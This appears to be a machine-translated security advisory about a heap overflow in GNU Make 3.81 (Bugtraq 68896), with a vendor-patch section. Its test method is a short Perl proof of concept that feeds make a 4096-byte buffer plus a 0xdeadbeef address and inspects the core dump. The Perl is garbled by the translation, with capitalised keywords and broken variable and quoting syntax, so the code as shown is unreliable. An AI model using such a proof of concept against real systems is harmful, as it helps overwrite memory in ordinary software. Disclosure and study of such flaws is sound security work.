GNU Make pointer indirect reference Heap Overflow Vulnerability

GNU Make pointer indirect reference Heap Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
GNU make 3.81
Description:
--------------------------------------------------------------------------------
Bugtraq id: 68896
 
GNU Make is a utility that automatically creates executable programs and libraries based on source code.
 
A heap overflow vulnerability exists in Make 3.81 and other versions. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.
 
<* Source: HyP
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/perl

Use 5.010;
Use strict;
Use warnings;
Say "Please set ulimit value to 1000 before (ulimit-c 1000 )";
Sleep 0.5;

My $ buff = "A" x 4096;
My $ addr = "\ xef \ xbe \ xad \ xde ";
My $ make = "./make ";
My $ gdb = "gdb -- core ";
My $ PAYLOAD = ('perl-e' print "$ buff". "$ addr "'');

My $ exec = qx ($ make $ PAYLOAD );

Say "Reading Core file GDB ";
Sleep 0.5;

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
GNU
---
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.gnu.org

This article permanently updates the link address: